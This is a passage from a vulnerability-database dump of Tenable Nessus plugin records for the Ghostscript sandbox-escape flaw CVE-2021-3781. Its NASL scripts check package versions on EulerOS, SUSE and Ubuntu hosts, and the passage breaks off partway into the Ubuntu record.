script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"EulerOS 2.0 SP9 : ghostscript (EulerOS-SA-2022-1839)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1839\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf067158\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ghostscript packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript-help\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"ghostscript-9.52-1.h5.eulerosv2r9\",\n \"ghostscript-help-9.52-1.h5.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:46", "description": "According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-06-06T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : ghostscript (EulerOS-SA-2022-1787)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2022-09-27T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ghostscript", "p-cpe:/a:huawei:euleros:ghostscript-help", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1787.NASL", "href": "https://www.tenable.com/plugins/nessus/161877", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161877);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/27\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"EulerOS 2.0 SP10 : ghostscript (EulerOS-SA-2022-1787)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ghostscript packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1787\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5d18133d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ghostscript packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ghostscript-help\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"ghostscript-9.52-4.h3.eulerosv2r10\",\n \"ghostscript-help-9.52-4.h3.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T14:34:16", "description": "The remote SUSE Linux SLED12 / SLES12 / SLES_SAP12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:3180-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-22T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : ghostscript (SUSE-SU-2021:3180-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2023-07-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ghostscript", "p-cpe:/a:novell:suse_linux:ghostscript-devel", "p-cpe:/a:novell:suse_linux:ghostscript-x11", "p-cpe:/a:novell:suse_linux:libspectre-devel", "p-cpe:/a:novell:suse_linux:libspectre1", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2021-3180-1.NASL", "href": "https://www.tenable.com/plugins/nessus/153536", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:3180-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153536);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/13\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:3180-1\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ghostscript (SUSE-SU-2021:3180-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED12 / SLES12 / SLES_SAP12 host has packages installed that are affected by a vulnerability as\nreferenced in the SUSE-SU-2021:3180-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1190381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3781\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-September/009476.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74f082d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12|SLES_SAP12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED12 / SLES12 / SLES_SAP12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED12 SP5\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP12\" && (! preg(pattern:\"^(3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP12 SP3/4/5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'5', 'release':'SLED12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'5', 'release':'SLED12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'ghostscript-devel-9.52-23.42.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libspectre-devel-0.2.7-12.12.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'ghostscript-9.52-23.42.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'ghostscript-x11-9.52-23.42.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libspectre1-0.2.7-12.12.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ghostscript / ghostscript-devel / ghostscript-x11 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:37", "description": "The remote Ubuntu 20.04 LTS / 21.04 host has packages installed that are affected by a vulnerability as referenced in the USN-5075-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS / 21.04 : Ghostscript vulnerability (USN-5075-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:21.04", "p-cpe:/a:canonical:ubuntu_linux:ghostscript", "p-cpe:/a:canonical:ubuntu_linux:ghostscript-x", "p-cpe:/a:canonical:ubuntu_linux:libgs-dev", "p-cpe:/a:canonical:ubuntu_linux:libgs9", "p-cpe:/a:canonical:ubuntu_linux:libgs9-common"], "id": "UBUNTU_USN-5075-1.NASL", "href": "https://www.tenable.com/plugins/nessus/153211", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5075-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153211);\n 